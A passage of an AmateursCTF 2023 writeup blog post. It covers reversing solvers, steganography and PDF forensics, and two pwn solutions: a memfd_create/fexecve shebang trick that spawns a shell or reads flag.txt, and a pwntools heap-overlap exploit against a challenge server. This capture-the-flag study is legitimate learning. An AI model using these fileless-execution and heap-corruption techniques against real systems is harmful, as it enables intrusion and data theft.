buf[b] = \");\n                    System.out.print(buf[b]);\n                    System.out.print(\" buf[b2] = \");\n                    System.out.println(buf[b2]);\n                    pc += 2;\n                    break;\n                case 8:       \n                    byte b3 = program[pc + 1];\n                    System.out.print(\"======> 0x8 b3 :\");\n                    System.out.print(b3);\n                    System.out.print(\"  buf[b3] = \");\n                    System.out.print(buf[b3]);\n                    System.out.print(\" + \");\n                    System.out.print(program[pc + 2]);\n                    buf[b3] = buf[b3] + program[pc + 2];\n                    System.out.print(\"  Result : \");\n                    System.out.println(buf[b3]);\n                    pc += 3;\n                    break;\n                case 9:\n                    byte b4 = program[pc + 1];\n                    System.out.print(\"======> 0x9 b4 : \");\n                    System.out.print(b4);\n                    System.out.print(\" buf[b4] = \");\n                    System.out.print(buf[b4]);\n                    System.out.print(\" + \");\n                    System.out.print(buf[program[pc + 2]]);\n                    buf[b4] = buf[b4] + buf[program[pc + 2]];\n                    System.out.print(\"  Result : \");\n                    System.out.println(buf[b4]);\n                    pc += 3;\n                    break;\n                case 12:\n                    // input-1\n                    // check-3\n                    byte b5 = program[pc + 1];\n                    // buf[0] = buf[b5] - 1\n                    System.out.print(\"======> 0x12 Buf :\");\n                    System.out.print(b5);\n                    System.out.print(\"  buf[b5] = \");\n                    System.out.print(buf[b5]);\n                    System.out.print(\" - \");\n                    System.out.print(program[pc + 2]);\n                    System.out.print(\"  Result : \");\n                    buf[b5] = buf[b5] - program[pc + 2];\n                    System.out.println(buf[b5]);\n                    pc += 3;\n                    break;\n                case 13:\n                    byte b6 = program[pc + 1];\n                    System.out.print(\"======> 0xd b6 :\");\n                    System.out.print(b6);\n                    System.out.print(\"  buf[b6] = \");\n                    System.out.print(buf[b6]);\n                    System.out.print(\" - \");\n                    System.out.print(buf[program[pc + 2]]);\n                    buf[b6] = buf[b6] - buf[program[pc + 2]];\n                    System.out.print(\"  Result : \");\n                    System.out.println(buf[b6]);\n                    pc += 3;\n                    break;\n                case 16:\n\n                    byte b7 = program[pc + 1];\n                    buf[b7] = buf[b7] * program[pc + 2];\n                    pc += 3;\n                    break;\n                case 17:\n\n                    byte b8 = program[pc + 1];\n                    buf[b8] = buf[b8] * buf[program[pc + 2]];\n                    pc += 3;\n                    break;\n                case 20:\n\n                    byte b9 = program[pc + 1];\n                    buf[b9] = buf[b9] / program[pc + 2];\n                    pc += 3;\n                    break;\n                case 21:\n\n                    byte b10 = program[pc + 1];\n                    buf[b10] = buf[b10] / buf[program[pc + 2]];\n                    pc += 3;\n                    break;\n                case 24:\n\n                    byte b11 = program[pc + 1];\n                    buf[b11] = buf[b11] % program[pc + 2];\n                    pc += 3;\n                    break;\n                case 25:\n                    byte b12 = program[pc + 1];\n                    buf[b12] = buf[b12] % buf[program[pc + 2]];\n                    pc += 3;\n                    break;\n                case 28:\n\n                    byte b13 = program[pc + 1];\n                    buf[b13] = buf[b13] << program[pc + 2];\n                    pc += 3;\n                    break;\n                case 29:\n\n                    byte b14 = program[pc + 1];\n                    buf[b14] = buf[b14] << buf[program[pc + 2]];\n                    pc += 3;\n                    break;\n                case 31:\n\n                    buf[program[pc + 1]] = bufferedReader.read();\n                    pc += 2;\n                    break;\n                case 32:\n                    // input-3 Read byte\n                    int i4 = sp;\n                    sp++;\n                    stack[i4] = bufferedReader.read();\n                    // System.out.println(stack[i4]);\n                    System.out.print(\"======> Read at : \");\n                    System.out.println(i4);\n                    pc++;\n                    break;\n                case 33:\n                    // System.out.print((char) buf[program[pc + 1]]);\n                    pc += 2;\n                    break;\n\n                case 34:\n                    // POP; Print\n                    sp--;\n                    // System.out.print((char) stack[sp]);\n                    pc++;\n                    break;\n                case 41:\n\n                    byte b15 = program[pc + 1];\n                    byte b16 = program[pc + 2];\n                    if (buf[b15] == 0) {\n                        pc = b16;\n                        break;\n                    } else {\n                        pc += 3;\n                        break;\n                    }\n                case 42:\n                    // input-2\n                    // check-4\n                    System.out.print(\"======> 0x2a Check buf : \");\n                    byte b17 = program[pc + 1]; // 0x0\n                    byte b18 = program[pc + 2]; // 0x12\n                    System.out.print(b17);\n                    System.out.print(\" Is buf[b17] == 0 : \");\n                    System.out.println(buf[b17]);\n                    if (buf[b17] != 0) {\n                        pc = b18; // pc を 0x12 に変更\n                        break;\n                    } else {\n                        // No more word\n                        pc += 3;\n                        break;\n                    }\n                case 43:\n                    // check-1\n                    pc = program[pc + 1]; // 0x2c\n                    break;\n                case 52:\n\n                    int i5 = sp;\n                    sp++;\n                    stack[i5] = buf[program[pc + 1]];\n                    pc += 2;\n                    break;\n\n                case 53:\n                    // check-2\n                    sp--;\n                    buf[program[pc + 1]] = stack[sp]; // program[pc + 1] = 0x0 \n                    System.out.println(\"===========================================\");\n                    System.out.print(\"======> 0x53 Buf :\");\n                    System.out.print(pc + 1);\n                    System.out.print(\"  into : \");\n                    System.out.println(stack[sp]);\n                    pc += 2;\n                    break;\n                case 54:\n\n                    int i6 = sp;\n                    sp++;\n                    stack[i6] = program[pc + 1];\n                    pc += 2;\n                    break;\n                case Byte.MAX_VALUE:\n                    bufferedReader.close();\n                    return;\n                default:\n\n                    byte b19 = program[pc];\n                    byte b20 = program[pc + 1];\n                    byte b21 = program[pc + 2];\n                    program[pc] = (byte) ((program[pc] ^ b20) ^ b21);\n                    program[pc + 1] = (byte) ((program[pc] ^ b19) ^ b21);\n                    program[pc + 2] = (byte) ((program[pc + 1] ^ b19) ^ b20);\n                    break;\n            }\n        }\n    }\n}
\n

Analyzing the result showed that the input values are validated through the 53 -> 12 or 42 operations.

\n

\n \n \n \n \n \n \n \n \n

\n

So based on the values I got from print debugging, I created the following solver and recovered the flag.

\n
with open(\"code.jvm\", \"rb\") as f:\n    code = f.read()\n\nflag = \"\"\nfor i in range(0x34,len(code)):\n    if code[i] == 53:\n        if code[i+2] == 12 and code[i+5] == 12:\n            a = code[i+4]\n            b = code[i+7]\n            flag += chr(a+b)\n        elif code[i+2] == 12 and code[i+5] == 42:\n            flag += \"_\"\n        # elif code[i+2] == 8:\n\n        else:\n            print(i)\n            # print(code[i+4],code[i+7])\n\nprint(flag[::-1])\namateursCTF{wh4t_d0_yoU_m34n_j4v4_isnt_A_vm?}
\n

rusteze 2(Rev)

\n
\n

My boss said Linux binaries wouldn’t reach enough customers so I was forced to make a Windows version.

\n

Flag is amateursCTF{[a-zA-Z0-9_]+}

\n
\n

This was another Rust binary challenge, but this time it was an EXE analysis problem.

\n

Tracing execution from the entry point shows that byte data laid out starting at 0x2c40 in the .data section is loaded as a function and then called.

\n

So I marked the consecutive region starting at 0x2c40 in the data section as a function and then decompiled it.

\n

I was able to recover a function like the following.

\n
void FUN_140002c40(void)\n\n{\n  byte bVar1;\n  longlong lVar2;\n  undefined8 uVar3;\n  longlong lVar4;\n  undefined8 *puVar5;\n  LPVOID *ppvVar6;\n  undefined **ppuVar7;\n  undefined **ppuVar8;\n  undefined8 local_188 [6];\n  LPCRITICAL_SECTION local_158;\n  LPVOID local_150 [3];\n  undefined4 uStack_138;\n  undefined4 uStack_134;\n  undefined4 uStack_130;\n  undefined4 uStack_12c;\n  PSRWLOCK pRStack_128;\n  undefined8 auStack_120 [6];\n  undefined8 auStack_f0 [3];\n  undefined uStack_d3;\n  undefined uStack_d2;\n  undefined uStack_d1;\n  undefined uStack_d0;\n  undefined uStack_cf;\n  undefined uStack_ce;\n  undefined uStack_cd;\n  undefined uStack_cc;\n  undefined uStack_cb;\n  undefined uStack_ca;\n  undefined uStack_c9;\n  undefined uStack_c8;\n  undefined uStack_c7;\n  undefined uStack_c6;\n  undefined uStack_c5;\n  undefined uStack_c4;\n  undefined uStack_c3;\n  undefined uStack_c2;\n  undefined uStack_c1;\n  undefined uStack_c0;\n  undefined uStack_bf;\n  undefined uStack_be;\n  undefined uStack_bd;\n  undefined uStack_bc;\n  undefined uStack_bb;\n  undefined uStack_ba;\n  undefined uStack_b9;\n  undefined uStack_b8;\n  undefined uStack_b7;\n  undefined uStack_b6;\n  undefined uStack_b5;\n  undefined uStack_b4;\n  undefined uStack_b3;\n  undefined uStack_b2;\n  undefined uStack_b1;\n  undefined8 auStack_b0 [6];\n  undefined8 auStack_80 [6];\n  undefined8 uStack_50;\n  undefined8 uStack_48;\n  longlong lStack_40;\n  LPVOID *ppvStack_38;\n  longlong lStack_30;\n  LPVOID *ppvStack_28;\n  longlong lStack_20;\n  LPVOID *ppvStack_18;\n  undefined8 local_10;\n  \n  local_10 = 0xfffffffffffffffe;\n  ppuVar7 = &PTR_DAT_140025698;\n  puVar5 = local_188;\n  FUN_140001d60(puVar5,&PTR_DAT_140025698,1,&PTR_s_src\\main.rs_1400256a8,0);\n  FUN_140009ef0((undefined4 *)puVar5,ppuVar7);\n  local_158 = (LPCRITICAL_SECTION)FUN_140009a50(puVar5,ppuVar7);\n  ppuVar7 = FUN_140009ac0(&local_158);\n  ppuVar8 = &PTR_s_src\\main.rs_1400256a8;\n  FUN_1400052e0((longlong)ppuVar7,&PTR_s_src\\main.rs_1400256a8);\n  ppvVar6 = local_150;\n  FUN_1400030e0(ppvVar6);\n  pRStack_128 = (PSRWLOCK)FUN_140009830(ppvVar6,ppuVar8);\n  ppvVar6 = local_150;\n  lVar2 = FUN_140009860(&pRStack_128,ppvVar6);\n  uStack_50._0_4_ = (undefined4)lVar2;\n  uStack_50._4_4_ = (undefined4)((ulonglong)lVar2 >> 0x20);\n  uStack_48._0_4_ = SUB84(ppvVar6,0);\n  uStack_48._4_4_ = (undefined4)((ulonglong)ppvVar6 >> 0x20);\n  uStack_138 = (undefined4)uStack_50;\n  uStack_134 = uStack_50._4_4_;\n  uStack_130 = (undefined4)uStack_48;\n  uStack_12c = uStack_48._4_4_;\n  uStack_50 = lVar2;\n  uStack_48 = ppvVar6;\n  FUN_140005370(lVar2,ppvVar6,&PTR_s_src\\main.rs_1400256c0);\n  uVar3 = FUN_140003130();\n  lVar2 = FUN_140004d90(uVar3,ppvVar6);\n  lStack_40 = lVar2;\n  ppvStack_38 = ppvVar6;\n  lStack_30 = lVar2;\n  ppvStack_28 = ppvVar6;\n  lStack_20 = lVar2;\n  ppvStack_18 = ppvVar6;\n  lVar4 = FUN_140006490(lVar2,ppvVar6);\n  if (lVar4 == 0x23) {\n    FUN_1400029c0(auStack_f0,lVar2,(ulonglong)ppvVar6);\n    uStack_d3 = 0x86;\n    uStack_d2 = 0x2b;\n    uStack_d1 = 0x12;\n    uStack_d0 = 0xf;\n    uStack_cf = 0x99;\n    uStack_ce = 0xcc;\n    uStack_cd = 0x1d;\n    uStack_cc = 0x55;\n    uStack_cb = 0xb7;\n    uStack_ca = 0x39;\n    uStack_c9 = 0xc5;\n    uStack_c8 = 0xbe;\n    uStack_c7 = 0xf3;\n    uStack_c6 = 0xab;\n    uStack_c5 = 0x5d;\n    uStack_c4 = 0x90;\n    uStack_c3 = 0x5f;\n    uStack_c2 = 0x5f;\n    uStack_c1 = 0x4c;\n    uStack_c0 = 0xaf;\n    uStack_bf = 0xb6;\n    uStack_be = 0x2b;\n    uStack_bd = 0xf1;\n    uStack_bc = 0x6c;\n    uStack_bb = 0xed;\n    uStack_ba = 0xbe;\n    uStack_b9 = 0x76;\n    uStack_b8 = 0x14;\n    uStack_b7 = 0x9b;\n    uStack_b6 = 0x88;\n    uStack_b5 = 0x88;\n    uStack_b4 = 0x20;\n    uStack_b3 = 0xa3;\n    uStack_b2 = 0xa0;\n    uStack_b1 = 4;\n    bVar1 = FUN_140004210();\n    if ((bVar1 & 1) == 0) {\n      ppuVar7 = &PTR_s_Correct!_140025700;\n      FUN_140001d60(auStack_80,&PTR_s_Correct!_140025700,1,&PTR_s_src\\main.rs_1400256a8,0);\n      FUN_140009ef0((undefined4 *)auStack_80,ppuVar7);\n      FUN_140006fe0((longlong)auStack_f0);\n      FUN_140006f80((longlong)local_150);\n      return;\n    }\n    ppuVar7 = &PTR_s_Wrong!_1400256e0;\n    FUN_140001d60(auStack_b0,&PTR_s_Wrong!_1400256e0,1,&PTR_s_src\\main.rs_1400256a8,0);\n    FUN_140009ef0((undefined4 *)auStack_b0,ppuVar7);\n    FUN_140006fe0((longlong)auStack_f0);\n  }\n  else {\n    ppuVar7 = &PTR_s_Wrong!_1400256e0;\n    FUN_140001d60(auStack_120,&PTR_s_Wrong!_1400256e0,1,&PTR_s_src\\main.rs_1400256a8,0);\n    FUN_140009ef0((undefined4 *)auStack_120,ppuVar7);\n  }\n  FUN_140006f80((longlong)local_150);\n  return;\n}
\n

Here, the program accepts an input of length 0x23, processes it in the function at offset 0x29c0, and finally stores the result in a memory region called BUF1.

\n

A later function then compares BUF1 with a hard-coded BUF2 using memcmp, and returns \"Correct\" if they match.

\n

By combining Ghidra and WinDbg during analysis, I found that this input transformation can be expressed as follows.

\n
for k in key:\n    f = (ord(\"a\")^k)\n    f = (f << 2 | f >> 6) & 0xFF\n    print(hex(f))
\n

So using the hard-coded byte sequence in BUF2, I brute-forced the correct input string.

\n
key = [i for i in range(35)]\nkey[0] = 0xd2\nkey[1] = 0xa5\nkey[2] = 0xf6\nkey[3] = 0xb1\nkey[4] = 0x1f\nkey[5] = 0x6c\nkey[6] = 0x33\nkey[7] = 0x3d\nkey[8] = 0x84\nkey[9] = 0x3d\nkey[10] = 0x2e\nkey[11] = 0xc6\nkey[12] = 0x8f\nkey[13] = 0x84\nkey[14] = 0x23\nkey[15] = 0x7b\nkey[16] = 0xa3\nkey[17] = 0xbf\nkey[18] = 0x76\nkey[19] = 0xb4\nkey[20] = 0xcb\nkey[21] = 0xa6\nkey[22] = 0x1d\nkey[23] = 0x7c\nkey[24] = 0x24\nkey[25] = 0xdb\nkey[26] = 0xf5\nkey[27] = 0x6c\nkey[28] = 0x95\nkey[29] = 0x7d\nkey[30] = 0x56\nkey[31] = 0x61\nkey[32] = 0x85\nkey[33] = 0x4d\nkey[34] = 0x2f\nans = [0x86,0x2b,0x12,0xf,0x99,0xcc,0x1d,0x55,0xb7,0x39,0xc5,0xbe,0xf3,0xab,0x5d,0x90,0x5f,0x5f,0x4c,0xaf,0xb6,0x2b,0xf1,0x6c,0xed,0xbe,0x76,0x14,0x9b,0x88,0x88,0x20,0xa3,0xa0,0x4]\n\nfor i in range(0x23):\n    for c in range(0x21,0x7e):\n        f = (c^key[i])\n        f = (f << 2 | f >> 6) & 0xFF\n        if f == ans[i]:\n            print(chr(c), end=\"\")\n            break
\n

However, while this string produced the Correct output, it still was not the flag.

\n

\n \n \n \n \n \n \n \n \n

\n

In fact, during the processing of BUF1, values were also being written to a particular data region at the same time.

\n

So I inspected that data region in WinDbg while entering the correct string, and that let me recover the flag.

\n

\n \n \n \n \n \n \n \n \n

\n

Painfully Deep Flag(Forensic)

\n
\n

This one is a bit deep in the stack.

\n
\n

A standard challenge.

\n

I was given a suspicious PDF, and when I broke it apart with pdftohtml, I was able to recover the flag.

\n
pdftohtml flag.pdf
\n

\n \n \n \n \n \n \n \n \n

\n

rules-iceberg(Forensic)

\n
\n

So apparently larry leaked this challenge already. Due to high demand for rules-iceberg stego and server profile picture discord stego, I’ve decided to release the challenge anyways.

\n
\n

We are given the image with the embedded string, the original image, and the following script that was used to embed the text.

\n
from PIL import Image\n\ndef encode_lsb(image_path, message):\n    # Open the image\n    image = Image.open(image_path)\n    pixels = image.load()\n\n    # Check if the message can fit within the image\n    if len(message) * 8 > image.width * image.height:\n        raise ValueError(\"Message is too long to fit within the image.\")\n\n    # Convert the message to binary\n    binary_message = ''.join(format(ord(char), '08b') for char in message)\n\n    # Embed the message into the image\n    char_index = 0\n    for y in range(image.height):\n        for x in range(image.width):\n            r, g, b, a = pixels[x, y]\n\n            if char_index < len(binary_message):\n                # Modify the second least significant bit of the red channel\n                # only if red is greater than green and blue\n                if r > g and r > b:\n                    r = (r & 0xFD) | (int(binary_message[char_index]) << 1)\n                    char_index += 1\n\n            pixels[x, y] = (r, g, b, a)\n\n    # Save the modified image\n    encoded_image_path = f\"new-{image_path}\"\n    image.save(encoded_image_path)\n    print(\"Message encoded successfully in the image:\", encoded_image_path)\n\n\n# Example usage\n# image_path = \"rules-iceberg.png\"\nimage_path = \"tmp.png\"\n\n# extract flag from flag.txt\nwith open(\"flag.txt\", \"r\") as f:\n    flag = f.read().strip()\n\n# assert len(flag) == 54\n\nencode_lsb(image_path, flag)
\n

This was an application of LSB steganography: a script that embeds the flag bits into the second least significant bit of r for pixels where the r value is larger than both g and b.

\n

In the image after embedding, the r values themselves have changed, so you can no longer tell which pixels had bits embedded just by looking at that image alone. That makes the original image the key.

\n

So by comparing the original image’s pixel data and extracting bits from the post-embedding image, I was able to recover the flag.

\n
from PIL import Image\n\n# Example usage\nimage_path = \"new-rules-iceberg.png\"\nimage = Image.open(image_path)\nnew_pixels = image.load()\n\nimage_path = \"rules-iceberg.png\"\nimage = Image.open(image_path)\npixels = image.load()\nbinary_message = \"\"\nfor y in range(image.height):\n    for x in range(image.width):\n        r, g, b, a = new_pixels[x, y]\n        rd, gd, bd, ad = pixels[x, y]\n\n        if rd > gd and rd > bd:\n            binary_message += str(((r >> 1) & 0x1))\n\ntext_message = \"\"\nfor i in range(0, len(binary_message), 8):\n    char = chr(int(binary_message[i:i+8], 2))\n    text_message += char\n\nprint(text_message)\n# amateursCTF{3v3ry0n3_d3f1n1t3ly_l0v3s_st3g0_mhmhmhmhm}
\n

ELFcrafting-v1(Pwn)

\n
\n

How well do you understand the ELF file format?

\n
\n

Looking at the challenge binary, it obtains a file descriptor for an anonymous file (one that lives in RAM and can be treated like a regular file) created by memfd_create, writes 32 bytes of arbitrary data into it, and then executes it with fexecve.

\n

This seems to be imitating fileless malware on Linux.

\n

Reference: Countermeasures against Fileless Malware on Linux

\n

However, unlike a real sample, the amount of data you can write into the anonymous file in this challenge is limited to 32 bytes.

\n

That means it is physically impossible to write a full ELF file, so you cannot execute one via fexecve.

\n

However, fexecve can execute not only ELF files, but also shebang-based shell commands.

\n

I verified this locally by creating the following sample.

\n
#define _GNU_SOURCE\n#define _POSIX_C_SOURCE 200809L\n\n#include <sys/types.h>\n#include <sys/mman.h>\n#include <sys/wait.h>\n\n#include <unistd.h>\n\n#include <err.h>\n#include <errno.h>\n\nsize_t min(size_t x, size_t y)\n{\n    return x > y ? y : x;\n}\n\n/**\n * @param len != 0\n */\nvoid fdput(int fd, const char *str, size_t len)\n{\n    size_t cnt = 0;\n    do {\n        ssize_t result = write(fd, str + cnt, min(len - cnt, 0x7ffff000));\n        if (result == -1) {\n            if (errno == EINTR)\n                continue;\n            err(1, \"%s failed\", \"write\");\n        }\n        cnt += result;\n    } while (cnt != len);\n}\n#define fdputc(fd, constant_str) fdput((fd), (constant_str), sizeof(constant_str) - 1)\n\nint main(int argc, char* argv[])\n{\n    int fd = memfd_create(\"script\", 0);\n    if (fd == -1)\n        err(1, \"%s failed\", \"memfd_create\");\n\n    fdputc(fd, \"#!/bin/sh\\n/bin/sh\");\n\n    pid_t pid = fork();\n    if (pid == 0) {\n        const char * const argv[] = {\"script\", NULL};\n        const char * const envp[] = {NULL};\n        fexecve(fd, (char * const *) argv, (char * const *) envp);\n\n        err(1, \"%s failed\", \"fexecve\");\n    } else if (pid == -1)\n        err(1, \"%s failed\", \"fork\");\n\n    wait(NULL);\n\n    return 0;\n}
\n

I thought that would be enough, but for some reason /bin/sh did not work on the remote server.

\n

So instead, I sent the following command and got the flag.

\n
\"#!/bin/cat flag.txt\"
\n

\n \n \n \n \n \n \n \n \n

\n

simple-heap-v1(Pwn)

\n
\n

Nothing to see here. Just a regular heap chall.

\n

nc amt.rs 31176

\n

Note: flag format is not the normal one

\n
\n

With help from a teammate, I solved one Pwn challenge.

\n

You can arbitrarily overwrite only a single byte starting from a specific chunk.

\n

The chunk where the flag is written gets freed immediately, and part of the flag is overwritten by the chunk header, so the challenge is to somehow read the contents of the flag-containing chunk before it is freed.

\n

While looking through the decompilation, I noticed that the chunk where the flag is written is adjacent to a chunk that I can control, and that it is also reused from the cache again and again.

\n

So by changing the size of the controllable chunk and making it overlap with the chunk where the flag gets written, I was able to read the contents of the flag chunk from the data of another chunk.

\n
from pwn import *\ndef start(argv=[], *a, **kw):\n    if args.GDB:  # Set GDBscript below\n        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)\n    elif args.REMOTE:  # ('server', 'port')\n        return remote(sys.argv[1], sys.argv[2], *a, **kw)\n    else:  # Run locally\n        return process([exe] + argv, *a, **kw)\n\n# Specify your GDB script here for debugging\n\ngdbscript = '''\nb *(main+275)\ncontinue\n'''.format(**locals())\n\nexe = \"./chal_simple_heap_v1\"\nelf = context.binary = ELF(exe, checksec=False)\ncontext.log_level = 'debug'\ncontext.arch=\"amd64\"\n\ndef malloc(io,size,data):\n    io.sendlineafter(b\"size\",size)\n    io.sendlineafter(b\"data\",data)\n\nio = start()\n\n# malloc(io,b\"128\",b\"a\"*128)\n# malloc(io,b\"128\",b\"a\"*128)\n\nmalloc(io,b\"10\",b\"a\"*10)\nmalloc(io,b\"10\",b\"a\"*10)\n\nio.sendlineafter(b\"index\",b\"-8\")\nio.sendlineafter(b\"new character: \",b\"\\xF0\")\n\nmalloc(io,b\"230\",b\"a\"*230)\n\nio.interactive()
\n

The solver above recovers the flag.

\n

ScreenshotGuesser(OSINT)

\n

A challenge where you identify coordinates from an SSID name.

\n

One of our team members solved this one.

\n

Apparently there is a service called WiGLE: Wireless Network Mapping that lets you search for SSIDs.

\n

Reference: Amateurs CTF 2023 Writeup - rikoteki’s blog

\n

Conclusion

\n

I completely burned through the three-day weekend and spent five full days immersed in CTF.

\n

It was fun.

","fields":{"slug":"/ctf-amature-2023-en","tagSlugs":["/tag/ctf-en/","/tag/rev-en/","/tag/pwn-en/","/tag/osint-en/","/tag/forensic-en/","/tag/english/"]},"frontmatter":{"date":"2023-07-21","description":"This is a writeup for AmateursCTF 2023.","tags":["CTF (en)","Rev (en)","Pwn (en)","OSINT (en)","Forensic (en)","English"],"title":"AmateursCTF 2023 Writeup","socialImage":{"publicURL":"/static/a13f3238ad022e66e892ba74fce3ccb3/ctf-amature-2023.png"}}}},"pageContext":{"slug":"/ctf-amature-2023-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}